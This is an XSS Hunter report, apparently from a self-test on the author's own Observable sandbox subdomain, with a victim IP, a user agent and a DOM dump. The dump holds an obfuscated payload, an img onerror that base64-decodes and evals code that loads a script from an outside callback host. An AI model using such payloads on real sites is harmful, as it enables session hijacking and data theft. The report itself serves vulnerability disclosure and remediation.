Edited Aug 11, 2020
md`# XSS Hunter Report

The page located at \`https://theabbie.static.observableusercontent.com/worker/worker.2e73608f8145b91e73428b4c507ff71657bde06e5c8a1470dff7af4714c84ae0.html\` suffers from a Cross-site Scripting (XSS) vulnerability. XSS is a vulnerability that occurs when user input is unsafely incorporated into the HTML markup of a web page. When that input is not properly escaped, an attacker can inject malicious JavaScript that, once evaluated, can be used to hijack authenticated sessions and rewrite the vulnerable page's layout and functionality. The following report contains information on an XSS payload that has fired on \`https://theabbie.static.observableusercontent.com\`; it can be used to reproduce and remediate the vulnerability.

### XSS Payload Fire Details
##### Vulnerable Page
\`https://theabbie.static.observableusercontent.com/worker/worker.2e73608f8145b91e73428b4c507ff71657bde06e5c8a1470dff7af4714c84ae0.html\`

##### Victim IP Address
\`49.32.50.36\`

##### Referer
\`https://observablehq.com/new\`

##### User Agent
\`Mozilla/5.0 (Linux; Android 10; Redmi Note 7 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36\`

##### Cookies (Non-HTTPOnly)

##### Document Object Model (DOM)
\`\`\`html
<html><head><meta charset="utf-8">
<base target="_top" href="https://observablehq.com/d/22a28a6d91cd6133">
<style>/*Copyright 2020 Observable, Inc.*/@import url("https://fonts.googleapis.com/css2?family=Source+Serif+Pro:ital,wght@0,400;0,600;0,700;1,400;1,600;1,700&display=swap");:root{--syntax_normal:#1b1e23;--syntax_comment:#828282;--syntax_diff:#24292e;--syntax_diff_bg:#fff;--syntax_number:#20a5ba;--syntax_keyword:#c30771;--syntax_atom:#10a778;--syntax_string:#008ec4;--syntax_error:#ffbedc;--syntax_unknown_variable:#838383;--syntax_known_variable:#005f87;--syntax_matchbracket:#20bbfc;--syntax_key:#6636b4;--selection:#d7d4f0;--hr:rgba(0,0,0,0.05);--mono_fonts:14px/1.5 Menlo,Consolas,monospace;--sans-serif:-apple-system,BlinkMacSystemFont,"avenir next",avenir,helvetica,"helvetica neue",ubuntu,roboto,noto,"segoe ui",arial,sans-serif}body{margin:0 14px;font-family:"Source Serif Pro",Iowan Old Style,Apple Garamond,Palatino Linotype,Times New Roman,"Droid Serif",Times,serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;font-size:17px;line-height:1.5;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;color:#1b1e23}body.fullscreen{margin:0}h1,h2,h3,h4,h5,h6{color:#333;font-weight:700;line-height:1.15;margin-top:0;margin-bottom:.25em}h2~p,h3~p,h4~p{margin-top:0}a[href]{text-decoration:none}a[href]:hover{text-decoration:underline}h1 code,h2 code,h3 code,h4 code,h5 code,h6 code{font-size:90%}code,pre,tt{font:var(--mono_fonts)}img{max-width:calc(100vw - 28px)}.katex-display,figure,h1,h2,h3,h4,h5,h6,p,table{max-width:640px}blockquote,ol,ul{max-width:600px}blockquote{margin:1em 1.5em}ol,ul{padding-left:28px}hr{height:1px;margin:1em 0;padding:1em 0;border:none;background:no-repeat 50%/100% 1px linear-gradient(90deg,var(--hr),var(--hr))}pre{padding:2px 0}.observablehq--md-pre{overflow-x:auto}.observablehq>link:only-child,.observablehq>style:only-child{display:block;visibility:hidden;padding:6px 
0;white-space:nowrap;font:var(--mono_fonts);color:var(--syntax_keyword)}.observablehq>link:only-child:before{content:"<link>";visibility:visible;text-decoration:none;pointer-events:none}.observablehq>style:only-child:before{content:"<style>";visibility:visible}input:not([type]),input[type=email],input[type=number],input[type=password],input[type=range],input[type=search],input[type=tel],input[type=text],input[type=url]{width:240px}canvas,input{vertical-align:middle}table{width:100%;border-collapse:collapse;font-family:var(--sans-serif);font-size:14px}th{text-align:left}tr:not(:last-child){border-bottom:1px solid #eee}thead tr{border-bottom:1px solid #ccc}figure{margin:1em 0}figure img{max-width:100%}figcaption{font:small var(--sans-serif);color:var(--syntax_unknown_variable)}.observablehq--collapsed,.observablehq--expanded,.observablehq--function,.observablehq--gray,.observablehq--import,.observablehq--string:after,.observablehq--string:before{color:var(--syntax_normal)}.observablehq--collapsed,.observablehq--expanded.observablehq--inspect 
a{cursor:pointer}.observablehq--caret{margin-right:4px;vertical-align:baseline}.observablehq--field{text-indent:-1em;margin-left:1em}.hljs-comment,.observablehq--empty,.observablehq--prototype-key{color:var(--syntax_comment)}.hljs-built_in{color:var(--syntax_known_variable)}.observablehq--unknown{color:var(--syntax_unknown_variable)}.hljs-doctag,.hljs-keyword,.hljs-name,.hljs-section,.hljs-selector-class,.hljs-selector-id,.hljs-selector-tag,.hljs-strong,.hljs-tag,.hljs-type{color:var(--syntax_keyword)}.observablehq--blue,.observablehq--keyword,a[href]{color:#3182bd}.hljs-deletion,.hljs-variable,.observablehq--forbidden,.observablehq--pink{color:#e377c2}.observablehq--orange{color:#e6550d}.hljs-literal,.observablehq--boolean,.observablehq--null,.observablehq--undefined{color:var(--syntax_atom)}.hljs-bullet,.hljs-link,.hljs-number,.hljs-regexp,.observablehq--bigint,.observablehq--date,.observablehq--green,.observablehq--number,.observablehq--regexp,.observablehq--symbol{color:var(--syntax_number)}.observablehq--index,.observablehq--key{color:var(--syntax_key)}.observablehq--empty{font-style:oblique}.hljs-addition,.hljs-meta,.hljs-string,.hljs-symbol,.hljs-template-tag,.hljs-template-variable,.observablehq--purple,.observablehq--string{color:var(--syntax_string)}.observablehq--error,.observablehq--red{color:#e7040f}.observablehq{position:relative;margin:17px 0;min-height:33px}.observablehq:before{content:"";position:absolute;left:-14px;height:100%;width:4px;transition:background-color .25s linear}.observablehq--changed:before,.observablehq--running:before{background-color:#a9b0bc;transition:none}.observablehq--error:before{background-color:#e7040f}.observablehq--inspect{font:var(--mono_fonts);overflow-x:auto;display:block;padding:6px 0;white-space:pre}.observablehq--inspect.observablehq--import{white-space:normal}.observablehq--inspect::-webkit-scrollbar{display:none}.observablehq--error 
.observablehq--inspect{word-break:break-all;white-space:pre-wrap}.observablehq--string-expand{margin-left:6px;padding:2px 6px;border-radius:2px;font-size:80%;background:#eee;color:var(--syntax_normal);cursor:pointer;vertical-align:middle;position:sticky;right:0}.observablehq--string-expand:active,.observablehq--string-expand:hover{background:#ddd}</style>
</head><body>
<script src="https://static.observableusercontent.com/worker/worker.905879b7a55ddbd0d3d15eab1e6a03c933bd3f9101324668f56e939031ebc03c.js"></script><div><div class="observablehq" dir="auto" style="margin-bottom: 174px;"><span><h1>XSS Test</h1>
<img src="x" id="dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdGhlYWJiaWUueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==" onerror="eval(atob(this.id))"></span></div></div><script src="https://theabbie.xss.ht"></script></body></html>
\`\`\`

##### Injection Point (Raw HTTP Request)
\`\`\`http
Could not correlate XSS payload fire with request!
\`\`\`
##### Origin
\`https://theabbie.static.observableusercontent.com\`

##### HTML5 Canvas-Rendered Screenshot
https://api.xsshunter.com/uploads/xsshunter_screenshot_920c4fce8011cf88461b1af2bbae5c61b494f51d6211cb13172f58691bf2289a04615b514f4962c09d5b71e7177b72b48e1553c32d5dfe72cf1f67bfb07a80b4c3b4b963a96bdc50ab340c33edd2eaace29f2e740e596b491c04beb4e99e8628dff8de9b.png

##### Injection Timestamp
\`1597127790\`

## Remediation
For more information about Cross-site Scripting and remediation of the issue, see the following resources:

* [Cross-site Scripting (XSS) - OWASP](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS))
* [XSS (Cross Site Scripting) Prevention Cheat Sheet - OWASP](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet)
* [What is Cross-site Scripting and How Can You Fix it?](https://www.acunetix.com/websitesecurity/cross-site-scripting/)
* [An Introduction to Content Security Policy - HTML5 Rocks](http://www.html5rocks.com/en/tutorials/security/content-security-policy/)
* [Why is the same origin policy so important? - Information Security Stack Exchange](https://security.stackexchange.com/questions/8264/why-is-the-same-origin-policy-so-important)

*This report was generated by the service hosted at [XSSHunter.com](https://xsshunter.com/).*`